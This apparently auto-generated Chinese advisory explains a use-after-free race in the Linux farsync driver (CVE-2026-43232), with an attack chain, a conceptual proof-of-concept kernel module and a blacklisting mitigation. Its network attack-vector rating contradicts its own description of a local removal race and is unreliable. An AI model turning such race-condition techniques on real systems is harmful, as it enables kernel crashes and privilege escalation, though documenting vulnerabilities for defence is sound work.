Linux内核farsync驱动释放后重用漏洞CVE-2026-43232

漏洞信息

漏洞编号

CVE-2026-43232

漏洞类型

释放后重用

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Linux Kernel

漏洞概述

Linux内核中的farsync驱动存在释放后重用漏洞。在移除FarSync T-series网卡设备时，`fst_card_info`结构体在`fst_remove_one`函数中被释放，但相关的tasklet任务（如`fst_tx_task`）可能仍在执行或等待调度。这种竞态条件导致tasklet处理函数在内存释放后继续访问该结构体，从而触发内核崩溃或可能被利用于权限提升。攻击者可利用此漏洞造成系统拒绝服务或进一步获取内核权限。

技术细节

该漏洞源于Linux内核farsync驱动卸载逻辑与软中断处理之间的竞态条件。当`fst_remove_one()`函数被调用以移除PCI设备时，它执行`unregister_hdlc_device()`并最终调用`kfree(card)`释放了`fst_card_info`对象。然而，代码逻辑存在缺陷，并未在释放内存前确保`fst_tx_task`和`fst_int_task`这两个tasklet已被彻底禁用或执行完毕。在多核处理器环境下，如果中断处理程序或网络传输流程在释放前调度了这些tasklet，它们将在`kfree`操作之后继续运行。当`fst_process_tx_work_q`或`fst_process_int_work_q`试图访问已释放的`card`指针及其成员时，会触发slab-use-after-free错误。KASAN追踪显示问题发生在`do_bottom_half_tx`函数中，读取了位于已释放区域28字节偏移处的数据。这种内存破坏不仅会导致内核崩溃（DoS），若被精心利用，还可能覆盖内核关键数据结构，从而实现本地权限提升。

攻击链分析

STEP 1

步骤1

攻击者诱导系统加载FarSync T-series网卡驱动，或等待驱动加载。

STEP 2

步骤2

攻击者触发网络流量或执行特定操作，导致驱动调度`fst_tx_task`或`fst_int_task` tasklet进入待处理队列。

STEP 3

步骤3

攻击者利用竞态窗口，触发设备移除操作（如模拟热插拔或调用卸载函数），执行`fst_remove_one`。

STEP 4

步骤4

系统执行`kfree(card)`释放`fst_card_info`内存，但此时tasklet尚未执行完毕。

STEP 5

步骤5

Tasklet在后台运行并尝试访问已释放的内存区域，触发Use-After-Free，导致内核崩溃或执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2026-43232
 * This code simulates the race condition between tasklet execution and device removal.
 * Note: Actual exploitation requires a specific environment with the vulnerable driver loaded.
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/interrupt.h>

struct fake_card {
    int data;
    // Simulating the fst_card_info structure
};

static struct fake_card *vulnerable_card;
static struct tasklet_struct tx_tasklet;

// Simulate the tasklet handler (fst_process_tx_work_q)
void tx_tasklet_handler(unsigned long data)
{
    struct fake_card *card = (struct fake_card *)data;
    
    // Introduce delay to increase window for race condition
    mdelay(100);
    
    // Access the card structure (Potential Use-After-Free)
    if (card) {
        printk(KERN_INFO "PoC: Accessing card data: %d\n", card->data);
    }
}

static int __init poc_init(void)
{
    vulnerable_card = kmalloc(sizeof(struct fake_card), GFP_KERNEL);
    if (!vulnerable_card)
        return -ENOMEM;
    
    vulnerable_card->data = 0x41414141;
    
    // Schedule the tasklet
    tasklet_init(&tx_tasklet, tx_tasklet_handler, (unsigned long)vulnerable_card);
    tasklet_schedule(&tx_tasklet);
    
    printk(KERN_INFO "PoC: Device initialized and tasklet scheduled.\n");
    
    // Simulate the removal race condition immediately
    // In the real vulnerability, fst_remove_one() does kfree(card) here
    // without checking if the tasklet is still running.
    printk(KERN_INFO "PoC: Simulating device removal (freeing memory)...\n");
    kfree(vulnerable_card);
    vulnerable_card = NULL;
    
    return 0;
}

static void __exit poc_exit(void)
{
    tasklet_kill(&tx_tasklet);
    printk(KERN_INFO "PoC: Exiting.\n");
}

module_init(poc_init);
module_exit(poc_exit);

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("PoC for CVE-2026-43232 Race Condition");

影响范围

Linux Kernel (主版本及稳定版)

Linux Kernel < 6.8 (需应用补丁)

防御指南

临时缓解措施

如果无法立即升级内核，建议禁用farsync驱动模块（例如通过在modprobe.d中配置blacklist farsync），以防止加载该有缺陷的驱动程序，从而避免漏洞被触发。